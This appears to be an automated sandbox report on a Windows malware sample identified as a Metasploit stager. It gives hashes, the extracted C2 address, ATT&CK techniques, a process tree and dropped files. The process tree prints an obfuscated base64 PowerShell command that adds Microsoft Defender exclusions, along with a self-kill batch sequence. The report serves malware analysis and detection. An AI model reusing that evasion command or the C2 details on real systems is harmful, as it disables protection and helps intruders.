metasploit | 00f0c2f3687ab8bf0990084d1e3af62246005c32084fa598aca1d65bdc0740c9

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
17-01-2025 07:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

192BCD791EAC82426C69C1496D9059E5.exe
Size

6.1MB
MD5

192bcd791eac82426c69c1496d9059e5
SHA1

036019f9b93f2b2cb80fa251fe769203994e0ae2
SHA256

00f0c2f3687ab8bf0990084d1e3af62246005c32084fa598aca1d65bdc0740c9
SHA512

e774a0a47ec7931a1928ac22f54c65089a340e24cb87fd9b59cf64e8ad203e0bd904da997318ff5c9f0aceddce70dfa415bfae053d97db374adff7cbbe03d3e0
SSDEEP

98304:66nonNZnR83jP+0g/7/DXj6Bi/cwIofEbo4P4HwsffoOX1g8:6WATR8zP/gD/DfP7WqfoOq8

Score

10^/10

metasploit backdoor defense_evasion discovery trojan

Malware Config

Extracted

Family

metasploit

Version

metasploit_stager

5.75.234.8:5050

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Executes dropped EXE 5 IoCs

pid	Process
2364	svchost.exe
2216	CRInjector.exe
2752	build.exe
2836	cr.exe
1264	Process not Found

Loads dropped DLL 6 IoCs

pid	Process
1896	192BCD791EAC82426C69C1496D9059E5.exe
1896	192BCD791EAC82426C69C1496D9059E5.exe
1896	192BCD791EAC82426C69C1496D9059E5.exe
2216	CRInjector.exe
2216	CRInjector.exe
1668	Process not Found

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
5	raw.githubusercontent.com
6	raw.githubusercontent.com
9	raw.githubusercontent.com
10	raw.githubusercontent.com
11	raw.githubusercontent.com
12	raw.githubusercontent.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	192BCD791EAC82426C69C1496D9059E5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CRInjector.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1660	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1372	taskkill.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2052	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2052	powershell.exe
Token: SeDebugPrivilege	2752	build.exe
Token: SeDebugPrivilege	1372	taskkill.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 1896 wrote to memory of 2052	1896	192BCD791EAC82426C69C1496D9059E5.exe	30
PID 1896 wrote to memory of 2052	1896	192BCD791EAC82426C69C1496D9059E5.exe	30
PID 1896 wrote to memory of 2052	1896	192BCD791EAC82426C69C1496D9059E5.exe	30
PID 1896 wrote to memory of 2052	1896	192BCD791EAC82426C69C1496D9059E5.exe	30
PID 1896 wrote to memory of 2364	1896	192BCD791EAC82426C69C1496D9059E5.exe	32
PID 1896 wrote to memory of 2364	1896	192BCD791EAC82426C69C1496D9059E5.exe	32
PID 1896 wrote to memory of 2364	1896	192BCD791EAC82426C69C1496D9059E5.exe	32
PID 1896 wrote to memory of 2364	1896	192BCD791EAC82426C69C1496D9059E5.exe	32
PID 1896 wrote to memory of 2216	1896	192BCD791EAC82426C69C1496D9059E5.exe	33
PID 1896 wrote to memory of 2216	1896	192BCD791EAC82426C69C1496D9059E5.exe	33
PID 1896 wrote to memory of 2216	1896	192BCD791EAC82426C69C1496D9059E5.exe	33
PID 1896 wrote to memory of 2216	1896	192BCD791EAC82426C69C1496D9059E5.exe	33
PID 2216 wrote to memory of 2752	2216	CRInjector.exe	34
PID 2216 wrote to memory of 2752	2216	CRInjector.exe	34
PID 2216 wrote to memory of 2752	2216	CRInjector.exe	34
PID 2216 wrote to memory of 2752	2216	CRInjector.exe	34
PID 2216 wrote to memory of 2836	2216	CRInjector.exe	35
PID 2216 wrote to memory of 2836	2216	CRInjector.exe	35
PID 2216 wrote to memory of 2836	2216	CRInjector.exe	35
PID 2216 wrote to memory of 2836	2216	CRInjector.exe	35
PID 2752 wrote to memory of 684	2752	build.exe	39
PID 2752 wrote to memory of 684	2752	build.exe	39
PID 2752 wrote to memory of 684	2752	build.exe	39
PID 684 wrote to memory of 1916	684	cmd.exe	41
PID 684 wrote to memory of 1916	684	cmd.exe	41
PID 684 wrote to memory of 1916	684	cmd.exe	41
PID 684 wrote to memory of 1372	684	cmd.exe	42
PID 684 wrote to memory of 1372	684	cmd.exe	42
PID 684 wrote to memory of 1372	684	cmd.exe	42
PID 684 wrote to memory of 1660	684	cmd.exe	43
PID 684 wrote to memory of 1660	684	cmd.exe	43
PID 684 wrote to memory of 1660	684	cmd.exe	43

C:\Users\Admin\AppData\Local\Temp\192BCD791EAC82426C69C1496D9059E5.exe
"C:\Users\Admin\AppData\Local\Temp\192BCD791EAC82426C69C1496D9059E5.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1896
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAawByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAdgBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAdgBnACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2052
- C:\Users\Admin\AppData\Local\Temp\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
  2⤵
  - Executes dropped EXE
  PID:2364
- C:\Users\Admin\AppData\Local\Temp\CRInjector.exe
  "C:\Users\Admin\AppData\Local\Temp\CRInjector.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2216
- - C:\Users\Admin\AppData\Local\Temp\build.exe
    "C:\Users\Admin\AppData\Local\Temp\build.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2752
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\bc76a946-10fb-413b-9dc2-3bf1f37458b1.bat"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:684
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:1916
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2752
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1372
    - - C:\Windows\system32\timeout.exe
        
        timeout /T 2 /NOBREAK
        5⤵
        Delays execution with timeout.exe
        
        PID:1660
- - C:\Users\Admin\AppData\Local\Temp\cr.exe
    "C:\Users\Admin\AppData\Local\Temp\cr.exe"
    3⤵
    - Executes dropped EXE
    PID:2836

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CabE0B0.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Stealerium-Latest.log

Filesize
1KB

MD5
3058014e5d7256824a8817f097fe9474

SHA1
c07a5435aac823d6ac9809e625c863d3c355de22

SHA256
c8ec1c9bed23e267f541bd1d4dbc83987fbd9db2cfbfdedfdd5a9e3b1ebd21f8

SHA512
798899b1527ee9622d78515658256d0721933e43286af87c11d019d669e1a7ba1c738353ea6c03a1831187e9f05e1d5e5f015f4dd9fdd297e5eff4bd020a7cb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Stealerium-Latest.log

Filesize
2KB

MD5
db34d7a39d10dae36927c3b4b7ffcf90

SHA1
a087991347cc9cbc9d02438b0059fb06d01b58e4

SHA256
97dcf4f5bd5ee46509caee140bac36ffc74cb88f4262e1c95ecec82bcfa26650

SHA512
695b79397c6fd972abb7c9187584a216fd88111a1dfa5ba77afa66f568a87aec2497a9eb203b5292953bba076b364c1fca335d4e2d9e8dc64ef6b4262f6fc2af

Download Submit
C:\Users\Admin\AppData\Local\Temp\Stealerium-Latest.log

Filesize
2KB

MD5
c69047a338c12f93f2beee8649a6d3c2

SHA1
0959fa05aefd09569e0b31f787226af64d279cb2

SHA256
c045751a9cf7c60068321aac414330bf975fc705da18d9a577300f54d34d9a33

SHA512
762931480da5ee9534d49b5678379148d6d01b914b9b3e04e8046908061b671b7f16d511a5c739f805243ea531aef5678cdf576c0528cb45ce159a00254a59a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Stealerium-Latest.log

Filesize
690B

MD5
8f3a67938c4410796348cd9c78ae133d

SHA1
b06f1a2387563229cca2cd64043b564b2591fa6a

SHA256
b78e73aa136915ba3dfc7e9a78c42b53935b3652447ab8a610f65ab31931c9bd

SHA512
8dee6a8e75c0d968807abe9f57af55f5bd86823792aaf96c46bc5de953c1d4b38e6dd059bca0892824bf5f5bfd8e73346e5f87cccaf29fed46d03580f93d3a27

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarE0D3.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\bc76a946-10fb-413b-9dc2-3bf1f37458b1.bat

Filesize
152B

MD5
bf6201068f9e6412f1e4081df8d0f865

SHA1
ee5d89c38a490a20f4d7c2e249b5fc82cf1cc350

SHA256
2f3bca1877be907a259adf0be834a12bfde390eec1e14c9737e21ffcf744400d

SHA512
0e28221fbea159892a98d002ce77d90e91d54eca4049e6ec763d1ce1ad71bce297905a05610cfe010aaf35584721d7dbf8f4daf3c0567bd50b857f792fe8f3ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\cr.exe

Filesize
23KB

MD5
84132b6ff67a2edc0086641076cbe74c

SHA1
82e5b836b6003635fb2c98a4851789ab093dfd30

SHA256
6061e0a08600cb5beb394bffd3ddfecd1699406f6709c7413962cb3881d845cf

SHA512
5096ffeb7f071a5811dca9a6088a99cdbb52240177094eaf9ecef9be27c84e46f4f56f197c0badd76f38cc79d5cbca68faea64c8060e589eab5d7e1dc7552548

Download Submit
\Users\Admin\AppData\Local\Temp\CRInjector.exe

Filesize
6.1MB

MD5
1d0ddf1ad8614ed2bf87a911d3191880

SHA1
137566648a65e7627ca26e8c6fc5712b4b46a54c

SHA256
e6426e2874c427878a7aa4b1c771f72cfcf4d97da189c7f1c7eba802d412af96

SHA512
d91c1840094ab7cf1686b1df53e55fc7bf45a14da4526f396776d7ac3340c5d6f82cf56464fa87d2f0320a4d060644c463ef3eb110d8ebb355df312a46e25051

Download Submit
\Users\Admin\AppData\Local\Temp\build.exe

Filesize
6.1MB

MD5
2270f282eea0a6f4f9281a9fa22643e8

SHA1
809c81c4a672704b281cd4a858cac8a10df26207

SHA256
a23477faa272984c38dbf7533dcab6c12395a2a32845910ba1c2cccb6797880d

SHA512
4e9e33d34f51ab7940f686733959ce3b06e1fffe1418bd44be60b1f31762aa2f9eccaa8ec7525d496f0c50160c32252008b74f813ddbc1f4b9bc42c64a22416c

Download Submit
\Users\Admin\AppData\Local\Temp\svchost.exe

Filesize
7KB

MD5
073d78ce1468ecbeedc0afecb126e6cd

SHA1
5ea217f44b9775effac3c44da2d551294923ae9f

SHA256
8bdcaef5756f0e60fdb0fb0c71bff9ff6631b5ad74c3d04614cb09bc83d25c31

SHA512
78ffc25e65100488487411582b3d4d732d50ee17daedc84eb1ada44d12a708eb4cf6eb97c9772f74057ae6cc011b4358c454169d87156cd1295a4748162908e0

Download Submit
memory/1896-10-0x0000000000A40000-0x0000000000A45000-memory.dmp

Filesize
20KB

Download
memory/1896-11-0x0000000000A40000-0x0000000000A45000-memory.dmp

Filesize
20KB

Download
memory/2364-12-0x0000000140000000-0x0000000140004278-memory.dmp

Filesize
16KB

Download
memory/2752-32-0x00000000013B0000-0x00000000019C6000-memory.dmp

Filesize
6.1MB

Download